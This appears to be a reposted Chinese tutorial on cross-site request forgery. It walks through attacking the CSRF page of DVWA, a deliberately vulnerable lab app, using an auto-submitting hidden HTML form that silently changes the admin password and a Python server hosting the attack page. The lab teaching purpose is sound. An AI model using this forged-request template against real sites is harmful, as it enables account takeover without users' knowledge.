欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 房产 > 家装 > CSRF(跨站请求伪造)

CSRF(跨站请求伪造)

2025/10/20 5:57:29 来源:https://blog.csdn.net/weixin_43435891/article/details/148708613  浏览:    关键词:CSRF(跨站请求伪造)

🧨 什么是 CSRF?

CSRF(Cross-Site Request Forgery) 是一种攻击方式,诱导已登录的用户浏览器发送未授权请求,比如更改密码、转账等,而用户并未察觉。

攻击前提:

  1. 受害者已登录某网站,并保持登录状态(有 Cookie)。
  2. 攻击者诱导受害者访问一个恶意页面,该页面发出请求到受害者登录的站点。
  3. 服务端认为请求合法,因为带有受害者的 Cookie。

✅ DVWA 中的 CSRF 测试位置:

  1. 拉取 DVWA 镜像并运行:docker run --rm -it -p 8080:80 vulnerables/web-dvwa
  2. 打开 DVWA Web 界面:http://localhost:8080,用户名:admin,密码:password
  3. 登录后,点击左侧菜单 “CSRF”。
  4. 默认功能是 修改用户密码,就是我们的测试点。

🔥 第一步:构造 CSRF 攻击页面(HTML 文件)

查看修改密码页面的前端代码:
在这里插入图片描述

你可以用如下代码,保存为 csrf_attack.html:


<!DOCTYPE html>
<html><body><h3>😈 正在发起 CSRF 攻击…</h3><form action="http://localhost:8080/vulnerabilities/csrf/" method="GET"><input type="hidden" name="password_new" value="hacked123" /><input type="hidden" name="password_conf" value="hacked123" /><input type="hidden" name="Change" value="Change" /><input type="submit" value="点我也改密码" /></form><script>document.forms[0].submit(); // 自动提交</script></body>
</html>

🔄 第二步:启动一个 HTTP 服务器(攻击服务器)

假设你用攻击者机器,运行:

python3 -m http.server 8082

在这里插入图片描述

然后在浏览器打开:

http://<攻击者IP>:8082/csrf_attack.html

如果你已登录 DVWA,访问该页面就会修改你的密码。
在这里插入图片描述
输入网址后回车结果:
在这里插入图片描述

✅ 第三步:验证密码是否被改了

回到 DVWA,尝试用新密码登录:

  • 用户名:admin
  • 密码:hacked123

🧱 防御思路(了解):

DVWA 高安全等级下会引入 CSRF Token 防护机制,攻击者无法伪造。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词